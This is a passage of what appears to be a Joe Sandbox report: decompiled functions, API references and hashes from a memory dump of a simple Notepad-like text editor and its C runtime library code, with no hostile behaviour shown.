Source File: 00000002.00000002.270317273.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.270301425.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.270350448.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.270407443.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fdqkbs.jbxd

Similarity

API ID: Heap$MessageProcessSendTextWindowlstrlen$AllocFreeLengthlstrcmp
String ID:
API String ID: 302198436-0
Opcode ID: cc72cb58a21e2fb17c5fff7b8e4ed7f1f6b45f72a17095162b12c3208c8c986d
Instruction ID: 738a3a3d88226cada9937fa8338a0d395f6bf2963d328e57f9c5620f5e592caa
Opcode Fuzzy Hash: cc72cb58a21e2fb17c5fff7b8e4ed7f1f6b45f72a17095162b12c3208c8c986d
Instruction Fuzzy Hash: 95312D76A40208EFDB119FA4EC48FDE7B68EB48304F158075FA05AB2A0DB75AD41DB58

Uniqueness

Uniqueness Score: -1.00%

Function 00401D4C Relevance: 15.1, APIs: 10, Instructions: 65
memorystringwindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401D4C(WCHAR* __edi) {
				void* _v8;
				void* _v12;
				int _v16;
				void* _t19;
				void* _t26;
				signed int _t27;
				void* _t34;
				WCHAR* _t37;
				int _t38;

				_t37 = __edi;
				_v16 = lstrlenW( *(__edi + 0x10));
				_t3 = GetWindowTextLengthW( *0x415f6c) + 1; // 0x1
				_t38 = _t3;
				_t19 = HeapAlloc(GetProcessHeap(), 0, _t38 + _t38);
				_t34 = _t19;
				if(_t34 != 0) {
					GetWindowTextW( *0x415f6c, _t34, _t38);
					SendMessageW( *0x415f6c, 0xb0,  &_v12,  &_v8);
					_t26 = ( *(__edi + 0xc) & 0x00000005) - 1;
					if(_t26 == 0) {
						L3:
						_t27 = _v12;
						if(_v8 - _t27 == _v16 && lstrcmpW( *(_t37 + 0x10), _t34 + _t27 * 2) == 0) {
							SendMessageW( *0x415f6c, 0xc2, 1,  *(_t37 + 0x14));
						}
						HeapFree(GetProcessHeap(), 0, _t34);
						return E00401C3A(_t37);
					}
					_t19 = _t26 - 4;
					if(_t19 == 0) {
						goto L3;
					}
				}
				return _t19;
			}

0x00401d4c
0x00401d63
0x00401d6c
0x00401d6c
0x00401d7c
0x00401d82
0x00401d86
0x00401d90
0x00401daf
0x00401db7
0x00401db8
0x00401dbf
0x00401dbf
0x00401dca
0x00401ded
0x00401ded
0x00401df9
0x00000000
0x00401e00
0x00401dba
0x00401dbd
0x00000000
0x00000000
0x00401dbd
0x00401e08

APIs

lstrlenW.KERNEL32(?), ref: 00401D57
GetWindowTextLengthW.USER32 ref: 00401D66
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401D75
HeapAlloc.KERNEL32(00000000), ref: 00401D7C
GetWindowTextW.USER32 ref: 00401D90
SendMessageW.USER32(000000B0,?,?), ref: 00401DAF
lstrcmpW.KERNEL32(?,?), ref: 00401DD3
SendMessageW.USER32(000000C2,00000001,?), ref: 00401DED
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401DF2
HeapFree.KERNEL32(00000000), ref: 00401DF9

Memory Dump Source

Source File: 00000002.00000002.270317273.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.270301425.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.270350448.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.270407443.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fdqkbs.jbxd

Similarity

API ID: Heap$MessageProcessSendTextWindow$AllocFreeLengthlstrcmplstrlen
String ID:
API String ID: 276103653-0
Opcode ID: 73957ffef09ac0703d59bfb5c25fef60643b5419a745646a960d329f4784b7a4
Instruction ID: 8ca4d24a7fc5045a5f5655c77c8d62678ef15db99f04df4acbda4ba5258b7913
Opcode Fuzzy Hash: 73957ffef09ac0703d59bfb5c25fef60643b5419a745646a960d329f4784b7a4
Instruction Fuzzy Hash: 3211FE31A00609FFDB11AFA4EC88EDE7F79FF08345F008076F545A2160DB75A9948B68

Uniqueness

Uniqueness Score: -1.00%

Function 00401B9F Relevance: 15.1, APIs: 10, Instructions: 60
windowclipboardCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E00401B9F(struct HMENU__* __ebx) {
				signed int _t3;
				signed int _t7;
				signed int _t15;
				int _t25;

				_t3 = SendMessageW( *0x415f6c, 0xc6, 0, 0);
				asm("sbb eax, eax");
				EnableMenuItem(__ebx, 0x110,  ~_t3 + 1);
				_t7 = IsClipboardFormatAvailable(1);
				asm("sbb eax, eax");
				EnableMenuItem(__ebx, 0x113,  ~_t7 + 1);
				_t25 = 0 | SendMessageW( *0x415f6c, 0xb0, 0, 0) >> 0x00000010 == _t11;
				EnableMenuItem(__ebx, 0x111, _t25);
				EnableMenuItem(__ebx, 0x112, _t25);
				EnableMenuItem(__ebx, 0x114, _t25);
				_t15 = GetWindowTextLengthW( *0x415f6c);
				asm("sbb eax, eax");
				return EnableMenuItem(__ebx, 0x116,  ~_t15 + 1);
			}

0x00401bb6
0x00401bc0
0x00401bca
0x00401bce
0x00401bd6
0x00401be0
0x00401c00
0x00401c09
0x00401c12
0x00401c1b
0x00401c23
0x00401c2b
0x00401c39

APIs

SendMessageW.USER32(000000C6,00000000,00000000), ref: 00401BB6
EnableMenuItem.USER32 ref: 00401BCA
IsClipboardFormatAvailable.USER32(00000001), ref: 00401BCE
EnableMenuItem.USER32 ref: 00401BE0
SendMessageW.USER32(000000B0,00000000,00000000), ref: 00401BF1
EnableMenuItem.USER32 ref: 00401C09
EnableMenuItem.USER32 ref: 00401C12
EnableMenuItem.USER32 ref: 00401C1B
GetWindowTextLengthW.USER32 ref: 00401C23
EnableMenuItem.USER32 ref: 00401C35

Memory Dump Source

Source File: 00000002.00000002.270317273.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.270301425.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.270350448.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.270407443.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fdqkbs.jbxd

Similarity

API ID: EnableItemMenu$MessageSend$AvailableClipboardFormatLengthTextWindow
String ID:
API String ID: 2096502293-0
Opcode ID: d73bab931a6c4aa741f3144eb11f6fe7fc513639e33c67cb141d44b45079a633
Instruction ID: 3a30abc31a22bbec39353dc46f3e4c67e205073161841612e8df996d8f39c960
Opcode Fuzzy Hash: d73bab931a6c4aa741f3144eb11f6fe7fc513639e33c67cb141d44b45079a633
Instruction Fuzzy Hash: 73014B71BD02187AF6242B36AC4BFFB2D1DDB81B51F148421B706EA0E2C9E558418964

Uniqueness

Uniqueness Score: -1.00%

Function 00401F93 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 150
stringfileCOMMON

Download Yara Rule

C-Code - Quality: 55%

			E00401F93(WCHAR* __eax) {
				signed int _v8;
				short _v528;
				signed int _t17;
				signed int _t18;
				WCHAR* _t19;
				WCHAR* _t20;
				WCHAR* _t26;
				void* _t29;
				void* _t34;
				long _t35;
				signed int _t39;
				signed int _t40;
				signed int _t41;
				void* _t45;
				RECT* _t46;
				WCHAR* _t47;
				WCHAR* _t48;

				_v8 = _v8 & 0x00000000;
				_t35 = 2;
				_t48 = __eax;
				_t45 = 0x20;
				L2:
				if( *_t48 == _t45) {
					_t48 = _t48 + _t35;
					goto L2;
				}
				_t17 =  *_t48 & 0x0000ffff;
				_t39 = (0 | _t17 == 0x00000022) + (0 | _t17 == 0x00000022) + 0x00000020 & 0x0000ffff;
				if(_t17 == _t39) {
					_t48 = _t48 + _t35;
				}
				_t46 = 0;
				while(1) {
					_t18 =  *_t48 & 0x0000ffff;
					if(_t18 == _t46) {
						break;
					}
					if(_t18 == _t39) {
						L10:
						_t48 = _t48 + _t35;
						L11:
						if( *_t48 == _t45) {
							goto L10;
						}
						_t19 = _t48;
						while(1) {
							_t40 =  *_t19 & 0x0000ffff;
							if(_t40 != _t45 && _t40 != 0x2d && _t40 != 0x2f) {
								break;
							}
							_t19 = _t19 + _t35;
							if(_t40 == _t45) {
								continue;
							}
							_t41 =  *_t19 & 0x0000ffff;
							if(_t41 == _t46) {
								L19:
								if( *_t19 == _t45) {
									goto L18;
								}
								if(_t41 == 0x50 || _t41 == 0x70) {
									if(_v8 == _t46) {
										_v8 = 1;
										_t48 = _t19;
									}
								}
								continue;
							}
							L18:
							_t19 = _t19 + _t35;
							goto L19;
						}
						_t20 =  *_t48 & 0x0000ffff;
						if(_t20 == _t46) {
							L41:
							return _t20;
						}
						if(_t20 != 0x22) {
							L30:
							0x400000(_t48);
							if(_t20 != 0) {
								L33:
								0x400000(_t48, 0xffffffff);
								_t20 = InvalidateRect( *0x415f64, _t46, _t46);
								if(_v8 == _t46) {
									goto L41;
								}
								0x400000();
								return _t20;
							}
							_t47 = L".txt";
							lstrcpynW( &_v528, _t48, 0x103 - lstrlenW(_t47));
							lstrcatW( &_v528, _t47);
							_t48 =  &_v528;
							_t26 = _t48;
							0x400000(_t26);
							if(_t26 == 0) {
								_t29 = E00401F1C( &_v528) - _t35;
								if(_t29 == 0) {
									return DestroyWindow( *0x415f64);
								}
								_t20 = _t29 - 4;
								if(_t20 != 0) {
									goto L41;
								}
								E0040101C( &_v528, 0);
								_t34 = CreateFileW( &_v528, 0x40000000, _t35, 0, 4, 0x80, 0);
								if(_t34 != 0xffffffff) {
									_t34 = CloseHandle(_t34);
								}
								0x400000();
								return _t34;
							}
							_t46 = 0;
							goto L33;
						}
						_t48 = _t48 + _t35;
						_t20 = _t48;
						if( *_t48 == _t46) {
							L29:
							 *_t20 = 0;
							goto L30;
						}
						while( *_t20 != 0x22) {
							_t20 = _t20 + _t35;
							if( *_t20 != _t46) {
								continue;
							}
							goto L29;
						}
						goto L29;
					}
					_t48 = _t48 + _t35;
				}
				if( *_t48 != _t39) {
					goto L11;
				}
				goto L10;
			}

0x00401f9c
0x00401fa5
0x00401fa8
0x00401faa
0x00401faf
0x00401fb2
0x00401fad
0x00000000
0x00401fad
0x00401fb4
0x00401fc3
0x00401fc9
0x00401fcb
0x00401fcb
0x00401fcd
0x00401fd8
0x00401fd8
0x00401fde
0x00000000
0x00000000
0x00401fd4
0x00401fe5
0x00401fe5
0x00401fe7
0x00401fea
0x00000000
0x00000000
0x00401fec
0x00401fee
0x00401fee
0x00401ff4
0x00000000
0x00000000
0x00402000
0x00402005
0x00000000
0x00000000
0x00402007
0x0040200d
0x00402011
0x00402014
0x00000000
0x00000000
0x00402019
0x00402023
0x00402025
0x0040202c
0x0040202c
0x00402023
0x00000000
0x00402019
0x0040200f
0x0040200f
0x00000000
0x0040200f
0x00402030
0x00402036
0x0040212f
0x0040212f
0x0040212f
0x0040203f
0x0040205c
0x0040205d
0x00402064
0x004020aa
0x004020ad
0x004020ba
0x004020c3
0x00000000
0x00000000
0x004020c5
0x00000000
0x004020c5
0x00402066
0x00402082
0x00402090
0x00402096
0x0040209c
0x0040209f
0x004020a6
0x004020d8
0x004020da
0x00000000
0x00402125
0x004020dc
0x004020df
0x00000000
0x00000000
0x004020eb
0x00402106
0x0040210f
0x00402112
0x00402112
0x00402118
0x00000000
0x00402118
0x004020a8
0x00000000
0x004020a8
0x00402041
0x00402043
0x00402048
0x00402057
0x00402059
0x00000000
0x00402059
0x0040204a
0x00402050
0x00402055
0x00000000
0x00000000
0x00000000
0x00402055
0x00000000
0x0040204a
0x00401fd6
0x00401fd6
0x00401fe3
0x00000000
0x00000000
0x00000000

APIs

lstrlenW.KERNEL32(.txt), ref: 0040206C
lstrcpynW.KERNEL32(?,?,00000103), ref: 00402082
lstrcatW.KERNEL32(?,.txt), ref: 00402090
InvalidateRect.USER32(00000000,00000000,?,000000FF), ref: 004020BA
CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000004,00000080,00000000,?,00000103), ref: 00402106
CloseHandle.KERNEL32(00000000,?,00000103), ref: 00402112
DestroyWindow.USER32(?,00000103), ref: 00402125

Strings

.txt, xrefs: 00402066, 0040206B, 00402088

Memory Dump Source

Source File: 00000002.00000002.270317273.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.270301425.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.270350448.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.270407443.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fdqkbs.jbxd

Similarity

API ID: CloseCreateDestroyFileHandleInvalidateRectWindowlstrcatlstrcpynlstrlen
String ID: .txt
API String ID: 1344828188-2195685702
Opcode ID: 2c9ef08aaa4472e4d1a1f41eb2009585cc25f3eca019096f6f0960fa0a650124
Instruction ID: d28bfcdb09bc5182ac3aec5d8d3b4e3140d473f0e5bda905505ba1bfea716dd4
Opcode Fuzzy Hash: 2c9ef08aaa4472e4d1a1f41eb2009585cc25f3eca019096f6f0960fa0a650124
Instruction Fuzzy Hash: CB4126729002219ADB306B619D8CBBB76A8DB54318F65413BF542F72E1E7BD4EC1C358

Uniqueness

Uniqueness Score: -1.00%

Function 00406359 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 96
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 96%

			E00406359(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t49;
				struct _CRITICAL_SECTION* _t50;
				struct _CRITICAL_SECTION* _t54;
				intOrPtr _t55;
				struct _CRITICAL_SECTION* _t57;
				signed int _t62;
				struct _CRITICAL_SECTION* _t67;
				void* _t82;
				struct _CRITICAL_SECTION* _t84;
				signed int _t86;
				void* _t87;

				_t82 = __edx;
				_push(0x10);
				_push(0x4120d8);
				E00405990(__ebx, __edi, __esi);
				_t84 = 0;
				 *(_t87 - 0x1c) = 0;
				E0040A357(0, 0, 1);
				 *((intOrPtr*)(_t87 - 4)) = 0;
				_t86 = 0;
				while(1) {
					 *(_t87 - 0x20) = _t86;
					if(_t86 >=  *0x4182a0) {
						break;
					}
					_t49 =  *0x417284 + _t86 * 4;
					if( *_t49 == 0) {
						_t50 = E00408BFA(0x38);
						 *( *0x417284 + _t86 * 4) = _t50;
						__eflags = _t50;
						if(_t50 != 0) {
							_t54 = InitializeCriticalSectionAndSpinCount( *( *0x417284 + _t86 * 4) + 0x20, 0xfa0);
							__eflags = _t54;
							_t55 =  *0x417284;
							if(_t54 != 0) {
								_t57 =  *((intOrPtr*)(_t55 + _t86 * 4)) + 0x20;
								__eflags = _t57;
								EnterCriticalSection(_t57);
								_t84 =  *( *0x417284 + _t86 * 4);
								 *(_t87 - 0x1c) = _t84;
								 *(_t84 + 0xc) = 0;
							} else {
								E00408BC0( *((intOrPtr*)(_t55 + _t86 * 4)));
								 *( *0x417284 + _t86 * 4) = 0;
							}
						}
						break;
					}
					_t62 =  *( *_t49 + 0xc);
					if((_t62 & 0x00000083) != 0 || (_t62 & 0x00008000) != 0) {
						L9:
						_t86 = _t86 + 1;
						continue;
					} else {
						_t11 = _t86 - 3; // -3
						_t94 = _t11 - 0x10;
						if(_t11 > 0x10) {
							L7:
							E004058F0(_t86,  *( *0x417284 + _t86 * 4));
							_t67 =  *( *0x417284 + _t86 * 4);
							if(( *(_t67 + 0xc) & 0x00000083) == 0) {
								_t84 = _t67;
								 *(_t87 - 0x1c) = _t84;
								break;
							} else {
								E0040595E(_t86, _t67);
								goto L9;
							}
						}
						_t12 = _t86 + 0x10; // 0x10
						if(E0040A295(0, _t82, _t84, _t86, _t94) == 0) {
							break;
						}
						goto L7;
					}
				}
				__eflags = _t84;
				if(_t84 != 0) {
					 *(_t84 + 0xc) =  *(_t84 + 0xc) & 0x00008000;
					 *((intOrPtr*)(_t84 + 4)) = 0;
					 *((intOrPtr*)(_t84 + 8)) = 0;
					 *_t84 = 0;
					 *((intOrPtr*)(_t84 + 0x1c)) = 0;
					_t40 = _t84 + 0x10;
					 *_t40 =  *(_t84 + 0x10) | 0xffffffff;
					__eflags =  *_t40;
				}
				 *((intOrPtr*)(_t87 - 4)) = 0xfffffffe;
				E00406483();
				return E004059D5(_t84);
			}

0x00406359
0x00406359
0x0040635b
0x00406360
0x00406367
0x00406369
0x0040636e
0x00406374
0x00406377
0x00406379
0x00406379
0x00406382
0x00000000
0x00000000
0x0040638d
0x00406392
0x004063f1
0x004063fd
0x00406400
0x00406402
0x00406415
0x0040641b
0x0040641d
0x00406422
0x0040643a
0x0040643a
0x0040643e
0x00406449
0x0040644c
0x0040644f
0x00406424
0x00406427
0x00406432
0x00406432
0x00406422
0x00000000
0x00406402
0x00406396
0x0040639b
0x004063e5
0x004063e5
0x00000000
0x004063a4
0x004063a4
0x004063a7
0x004063aa
0x004063be
0x004063c7
0x004063d3
0x004063da
0x004063e8
0x004063ea
0x00000000
0x004063dc
0x004063de
0x00000000
0x004063e4
0x004063da
0x004063ac
0x004063b8
0x00000000
0x00000000
0x00000000
0x004063b8
0x0040639b
0x00406452
0x00406454
0x00406456
0x0040645d
0x00406460
0x00406463
0x00406465
0x00406468
0x00406468
0x00406468
0x00406468
0x0040646c
0x00406473
0x0040647f

APIs

Part of subcall function 0040A357: __mtinitlocknum.LIBCMT ref: 0040A36D
Part of subcall function 0040A357: __amsg_exit.LIBCMT ref: 0040A379
Part of subcall function 0040A357: EnterCriticalSection.KERNEL32(00000000,00000000,?,004071C6,0000000D), ref: 0040A381

__mtinitlocknum.LIBCMT ref: 004063B0
__malloc_crt.LIBCMT ref: 004063F1
InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000FA0,004120D8,00000010,00403123,00412030,0000000C,004031A1,?,?,00000040,?,004025E0,?,00410660), ref: 00406415
_free.LIBCMT ref: 00406427
EnterCriticalSection.KERNEL32(?,?,004025E0,?,00410660), ref: 0040643E

Strings

?, xrefs: 0040636E

Memory Dump Source

Source File: 00000002.00000002.270317273.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.270301425.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.270350448.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.270407443.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fdqkbs.jbxd

Similarity

API ID: CriticalSection$Enter__mtinitlocknum$CountInitializeSpin__amsg_exit__malloc_crt_free
String ID: ?
API String ID: 2015852156-3428610318
Opcode ID: 8e7ca56090d353e5bc7da073f189eb37fa484c70df19706af74def21355532fe
Instruction ID: b9cd1371c41a4ab66219e786f190016f3e2e04b6ac3045ceef4f163d49476006
Opcode Fuzzy Hash: 8e7ca56090d353e5bc7da073f189eb37fa484c70df19706af74def21355532fe
Instruction Fuzzy Hash: 523170715046019FC710DFA9D481A5AB7F4BB08324B5181BFF496A72D2CB79D4528F4D

Uniqueness

Uniqueness Score: -1.00%

Function 0040717C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 91%

			E0040717C(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t26;
				intOrPtr _t30;
				intOrPtr _t39;
				void* _t40;

				_t31 = __ebx;
				_push(8);
				_push(0x412118);
				E00405990(__ebx, __edi, __esi);
				GetModuleHandleW(L"KERNEL32.DLL");
				_t39 =  *((intOrPtr*)(_t40 + 8));
				 *((intOrPtr*)(_t39 + 0x5c)) = 0x411108;
				 *(_t39 + 8) =  *(_t39 + 8) & 0x00000000;
				 *((intOrPtr*)(_t39 + 0x14)) = 1;
				 *((intOrPtr*)(_t39 + 0x70)) = 1;
				 *((char*)(_t39 + 0xc8)) = 0x43;
				 *((char*)(_t39 + 0x14b)) = 0x43;
				 *(_t39 + 0x68) = 0x414588;
				E0040A357(__ebx, 1, 0xd);
				 *(_t40 - 4) =  *(_t40 - 4) & 0x00000000;
				InterlockedIncrement( *(_t39 + 0x68));
				 *(_t40 - 4) = 0xfffffffe;
				E0040721E();
				E0040A357(_t31, 1, 0xc);
				 *(_t40 - 4) = 1;
				_t26 =  *((intOrPtr*)(_t40 + 0xc));
				 *((intOrPtr*)(_t39 + 0x6c)) = _t26;
				if(_t26 == 0) {
					_t30 =  *0x414cf0; // 0x414c18
					 *((intOrPtr*)(_t39 + 0x6c)) = _t30;
				}
				E00408700( *((intOrPtr*)(_t39 + 0x6c)));
				 *(_t40 - 4) = 0xfffffffe;
				return E004059D5(E00407227());
			}

0x0040717c
0x0040717c
0x0040717e
0x00407183
0x0040718d
0x00407193
0x00407196
0x0040719d
0x004071a4
0x004071a7
0x004071aa
0x004071b1
0x004071b8
0x004071c1
0x004071c7
0x004071ce
0x004071d4
0x004071db
0x004071e2
0x004071e8
0x004071eb
0x004071ee
0x004071f3
0x004071f5
0x004071fa
0x004071fa
0x00407200
0x00407206
0x00407217

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,00412118,00000008,00407284,00000000,00000000,?,004033DA,004029D6,?,?,?,004029D6,00000000,?), ref: 0040718D
__lock.LIBCMT ref: 004071C1

Part of subcall function 0040A357: __mtinitlocknum.LIBCMT ref: 0040A36D
Part of subcall function 0040A357: __amsg_exit.LIBCMT ref: 0040A379
Part of subcall function 0040A357: EnterCriticalSection.KERNEL32(00000000,00000000,?,004071C6,0000000D), ref: 0040A381

InterlockedIncrement.KERNEL32(?), ref: 004071CE
__lock.LIBCMT ref: 004071E2
___addlocaleref.LIBCMT ref: 00407200

Strings

KERNEL32.DLL, xrefs: 00407188

Memory Dump Source

Source File: 00000002.00000002.270317273.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.270301425.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.270350448.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.270407443.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fdqkbs.jbxd

Similarity

API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
String ID: KERNEL32.DLL
API String ID: 637971194-2576044830
Opcode ID: 0a91ecfa04415f3b9691a1c01f2d8f1f275eaf0e965da356deb9f58161e8f8cc
Instruction ID: 828e2d9a6aef1ecd1850dd2157baaa58032c3ea6c81483b33c0403e429775c2e
Opcode Fuzzy Hash: 0a91ecfa04415f3b9691a1c01f2d8f1f275eaf0e965da356deb9f58161e8f8cc
Instruction Fuzzy Hash: 18016571844B00EBD710DF6AD805749FBE0BF54325F20891FE599663E1CBB8A544CF19

Uniqueness

Uniqueness Score: -1.00%

Function 0040823F Relevance: 9.0, APIs: 6, Instructions: 47
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 81%

			E0040823F(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				LONG* _t21;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t25 = __ebx;
				_push(0xc);
				_push(0x4121a8);
				E00405990(__ebx, __edi, __esi);
				_t31 = E004072A9(__ebx, __edx, _t35);
				_t15 =  *0x414aa8; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E0040A357(_t25, _t31, 0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0x4149b0; // 0x2392c18
					if(__eflags != 0) {
						__eflags = _t33;
						if(__eflags != 0) {
							__eflags = InterlockedDecrement(_t33);
							if(__eflags == 0) {
								__eflags = _t33 - 0x414588;
								if(__eflags != 0) {
									E00408BC0(_t33);
								}
							}
						}
						_t21 =  *0x4149b0; // 0x2392c18
						 *(_t31 + 0x68) = _t21;
						_t33 =  *0x4149b0; // 0x2392c18
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E004082DA();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				_t38 = _t33;
				if(_t33 == 0) {
					_push(0x20);
					E004069B9(_t29, _t38);
				}
				return E004059D5(_t33);
			}

0x0040823f
0x0040823f
0x0040823f
0x0040823f
0x00408241
0x00408246
0x00408250
0x00408252
0x0040825a
0x0040827b
0x00408281
0x00408285
0x00408288
0x0040828b
0x00408291
0x00408293
0x00408295
0x0040829e
0x004082a0
0x004082a2
0x004082a8
0x004082ab
0x004082b0
0x004082a8
0x004082a0
0x004082b1
0x004082b6
0x004082b9
0x004082bf
0x004082c3
0x004082c3
0x004082c9
0x004082d0
0x00408262
0x00408262
0x00408262
0x00408265
0x00408267
0x00408269
0x0040826b
0x00408270
0x00408278

APIs

__getptd.LIBCMT ref: 0040824B

Part of subcall function 004072A9: __getptd_noexit.LIBCMT ref: 004072AC
Part of subcall function 004072A9: __amsg_exit.LIBCMT ref: 004072B9

__amsg_exit.LIBCMT ref: 0040826B
__lock.LIBCMT ref: 0040827B
InterlockedDecrement.KERNEL32(?), ref: 00408298
_free.LIBCMT ref: 004082AB
InterlockedIncrement.KERNEL32(02392C18), ref: 004082C3

Memory Dump Source

Source File: 00000002.00000002.270317273.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.270301425.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.270350448.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.270407443.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fdqkbs.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
String ID:
API String ID: 3470314060-0
Opcode ID: 11f5c857de3714da6356fe4488d6a5ed58f9aa1e56db6d9a73a6ef2baea13d47
Instruction ID: 9dd0b61804cb2939324514bc7d4c0d8b777e788f75e63934b552d476fc708038
Opcode Fuzzy Hash: 11f5c857de3714da6356fe4488d6a5ed58f9aa1e56db6d9a73a6ef2baea13d47
Instruction Fuzzy Hash: 5D018E71901B11EBCA10AB66A645B9A7760AB44760F1540BFE854732C0CB3C68918B9D

Uniqueness

Uniqueness Score: -1.00%

Function 00401051 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 37
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401051() {
				char _v8;
				void* _v12;
				int _v16;
				int _v20;
				long _t17;
				char _t19;

				_t19 = 0x60;
				if(RegOpenKeyW(0x80000005, L"Software\\Fonts",  &_v12) == 0) {
					_v16 = 4;
					_t17 = RegQueryValueExW(_v12, L"LogPixels", 0,  &_v20,  &_v8,  &_v16);
					if(_t17 == 0 && _v20 == 4 && _v8 != _t17) {
						_t19 = _v8;
					}
					RegCloseKey(_v12);
				}
				return _t19;
			}

0x0040105a
0x00401071
0x00401089
0x00401090
0x00401098
0x004010a5
0x004010a5
0x004010ab
0x004010ab
0x004010b5

APIs

RegOpenKeyW.ADVAPI32(80000005,Software\Fonts,?), ref: 00401069
RegQueryValueExW.ADVAPI32(?,LogPixels,00000000,?,?,?), ref: 00401090
RegCloseKey.ADVAPI32(?), ref: 004010AB

Strings

LogPixels, xrefs: 00401081
Software\Fonts, xrefs: 0040105F

Memory Dump Source

Source File: 00000002.00000002.270317273.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.270301425.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.270350448.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.270407443.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fdqkbs.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: LogPixels$Software\Fonts
API String ID: 3677997916-4238338266
Opcode ID: 34b995cda39885bd0091ff1aef1a18e8392eafd054f4e5ed3edcd8db48220016
Instruction ID: a9dc7ae54450fe8809de1ee31deae739da478254df8c1b302dfb453a41a3a578
Opcode Fuzzy Hash: 34b995cda39885bd0091ff1aef1a18e8392eafd054f4e5ed3edcd8db48220016
Instruction Fuzzy Hash: 6CF03776A00209FADB209B94DC04FEFBBB8EB44705F104177EA41B2190E6B49A88CB19

Uniqueness

Uniqueness Score: -1.00%

Function 0040C5DF Relevance: 7.6, APIs: 5, Instructions: 68
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 94%

			E0040C5DF(void* __edx, void* __edi, void* __esi, void* _a4, long _a8) {
				void* _t7;
				long _t8;
				intOrPtr* _t9;
				intOrPtr* _t12;
				long _t27;
				long _t30;

				if(_a4 != 0) {
					_push(__esi);
					_t30 = _a8;
